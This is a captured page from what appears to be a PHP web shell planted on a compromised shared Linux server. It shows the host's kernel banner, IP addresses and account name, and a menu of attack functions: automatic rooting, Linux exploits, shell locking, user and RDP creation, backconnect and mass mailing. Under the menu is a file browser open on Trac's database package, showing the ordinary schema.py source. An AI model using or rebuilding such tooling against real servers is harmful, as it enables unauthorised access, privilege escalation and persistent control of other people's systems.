Linux iad1-shared-b7-18 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
Apache
: 67.205.6.31 | : 216.73.216.47
Cant Read [ /etc/named.conf ]
8.2.29
fernandoquevedo
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
lib /
python3 /
dist-packages /
trac /
db /
[ HOME SHELL ]
Name
Size
Permission
Action
__pycache__
[ DIR ]
drwxr-xr-x
__init__.py
554
B
-rw-r--r--
api.py
25.73
KB
-rw-r--r--
convert.py
4.6
KB
-rw-r--r--
mysql_backend.py
20.81
KB
-rw-r--r--
pool.py
7.54
KB
-rw-r--r--
postgres_backend.py
16.25
KB
-rw-r--r--
schema.py
2.04
KB
-rw-r--r--
sqlite_backend.py
16.93
KB
-rw-r--r--
util.py
5.32
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : schema.py
# -*- coding: utf-8 -*- # # Copyright (C) 2005-2021 Edgewall Software # Copyright (C) 2005 Christopher Lenz <cmlenz@gmx.de> # All rights reserved. # # This software is licensed as described in the file COPYING, which # you should have received as part of this distribution. The terms # are also available at https://trac.edgewall.org/wiki/TracLicense. # # This software consists of voluntary contributions made by many # individuals. For the exact contribution history, see the revision # history and logs, available at https://trac.edgewall.org/log/. # # Author: Christopher Lenz <cmlenz@gmx.de> class Table(object): """Declare a table in a database schema.""" def __init__(self, name, key=[]): self.name = name self.columns = [] self.indices = [] self.key = [key] if isinstance(key, str) else key def __getitem__(self, objs): self.columns = [o for o in objs if isinstance(o, Column)] self.indices = [o for o in objs if isinstance(o, Index)] return self def remove_columns(self, column_names): """Remove columns specified in the list or tuple `column_names`.""" if not isinstance(column_names, (list, tuple)): column_names = [column_names] if any(c in column_names for c in self.key): self.key = [] self.columns = [col for col in self.columns if col.name not in column_names] self.indices = [idx for idx in self.indices if all(c not in column_names for c in idx.columns)] class Column(object): """Declare a table column in a database schema.""" def __init__(self, name, type='text', size=None, key_size=None, auto_increment=False): self.name = name self.type = type self.size = size self.key_size = key_size self.auto_increment = auto_increment class Index(object): """Declare an index for a database schema.""" def __init__(self, columns, unique=False): self.columns = columns self.unique = unique
Close